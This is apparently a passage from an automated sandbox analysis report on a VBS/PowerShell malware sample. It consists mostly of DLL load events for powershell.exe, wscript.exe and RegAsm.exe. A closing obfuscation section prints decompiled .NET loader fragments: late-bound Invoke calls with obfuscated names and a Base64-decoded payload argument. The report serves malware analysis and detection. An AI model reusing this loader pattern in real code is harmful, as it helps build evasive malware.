Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: ___win________________________________________-------.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: sostener.vbs	Static file information: File size 16171698 > 1048576

                Data Obfuscation

                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.zvY5BN2heK2TIOcNrbC0bNPZMGqnvAf,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9._0vBrtUZw7hUa1AOY5rvY7w8NmpLzHvD,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.bh72IhDw8xw2gMDfROdrEx3RkxspqBE,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.qQLtJVEG6Uovk3EgktqwU8y7gjto7WK,gNcBSL9UPrQHBDmUF.DfcW1H207ggSRdKZf()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EbvtVjzdwvbRTWudA[2],gNcBSL9UPrQHBDmUF.JMsdl19vGU2jGWaRz(Convert.FromBase64String(EbvtVjzdwvbRTWudA[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.zvY5BN2heK2TIOcNrbC0bNPZMGqnvAf,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9._0vBrtUZw7hUa1AOY5rvY7w8NmpLzHvD,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.bh72IhDw8xw2gMDfROdrEx3RkxspqBE,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.qQLtJVEG6Uovk3EgktqwU8y7gjto7WK,gNcBSL9UPrQHBDmUF.DfcW1H207ggSRdKZf()}}, (string[])null, (Type[])null, (bool[])null, true)
